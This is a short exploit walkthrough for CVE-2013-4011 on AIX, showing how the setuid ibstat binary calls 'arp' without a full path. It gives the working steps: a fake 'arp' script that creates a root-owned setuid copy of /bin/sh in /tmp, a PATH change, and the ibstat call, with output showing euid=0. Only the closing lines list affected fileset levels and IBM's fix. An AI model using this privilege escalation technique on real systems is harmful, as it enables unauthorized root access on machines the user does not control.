Exploit CVE-2013-4011

In July 2013 we saw a new vulnerabilite on AIX, it’s possible to allow local users to gain privileges with a very simple way.

The fail is due to a programming error in ibstat command

(futex@aixbox) $ which ibstat
/usr/bin/ibstat
(futex@aixbox) $ ls -l /usr/bin/ibstat
lrwxrwxrwx    1 root     bin              16 01 oct 02:18 /usr/bin/ibstat -> /usr/sbin/ibstat
(futex@aixbox) $ ls -l /usr/sbin/ibstat
-r-sr-xr-x    1 root     bin           47388 12 nov 2012  /usr/sbin/ibstat

After hunts, the real binary is /usr/sbin/ibstat, and is setuid bit!

With a simple string command, we can see which command the binary use

(futex@aixbox) $ strings /usr/sbin/ibstat | grep ifconfig
ifconfig %s
(futex@aixbox) $ strings /usr/sbin/ibstat | grep arp
arp -t ib -a
(futex@aixbox) $ strings /usr/sbin/ibstat | grep lsattr
lsattr -El %s

As we can see, all command are not call with her full path! So, we can exploit it easilly.

We place ourselves in the tmp directory

(futex@aixbox) $ cd /tmp

And we create a script with the name of one command use in ibstat binary, his goal is just copy the shell binary in /tmp and set setuit bit

(futex@aixbox) $ vi arp

#!/bin/sh

cp /bin/sh /tmp/root
chown root /tmp/root
chmod 4755 /tmp/root

Don’t forget to set executable bit on the script

(futex@aixbox) $ chmod 755 ./arp

After, we change the PATH environnement variable:

(futex@aixbox) $ PATH=.:${PATH}
(futex@aixbox) $ which arp
./arp

And launch ibstat command

(futex@aixbox) $ ibstat -a -i en0

ERROR: “/dev/en0″: open failed rc=2, errno=2
Check device state of “icm” and “en0″.

===============================================================================
IB INTERFACE ARP TABLE
===============================================================================

/tmp/arp script is launch by ibstat command, this command have root owner and setuid bit, so it execute witch root priviliges, and lauch our script witch root privilege too :)


(futex@aixbox) $ ls -l /tmp/root
-rwsr-xr-x    1 root     sys          292606 14 oct 10:48 /tmp/root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys)
(futex@aixbox) $ ./root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys) euid=0(root)

ibstat command is in devices.common.IBM.ib.rte fileset

The following fileset levels are vulnerable:


AIX Fileset Lower Level Upper Level
-------------------------------------------------------
devices.common.IBM.ib.rte 6.1.6.0 6.1.6.21
devices.common.IBM.ib.rte 6.1.7.0 6.1.7.18
devices.common.IBM.ib.rte 6.1.8.0 6.1.8.15
devices.common.IBM.ib.rte 7.1.0.0 7.1.0.21
devices.common.IBM.ib.rte 7.1.1.0 7.1.1.18
devices.common.IBM.ib.rte 7.1.2.0 7.1.2.15

You must upgrade your system, or install thie fix


ftp://aix.software.ibm.com/aix/efixes/security/infiniband_fix.tar

Rock it!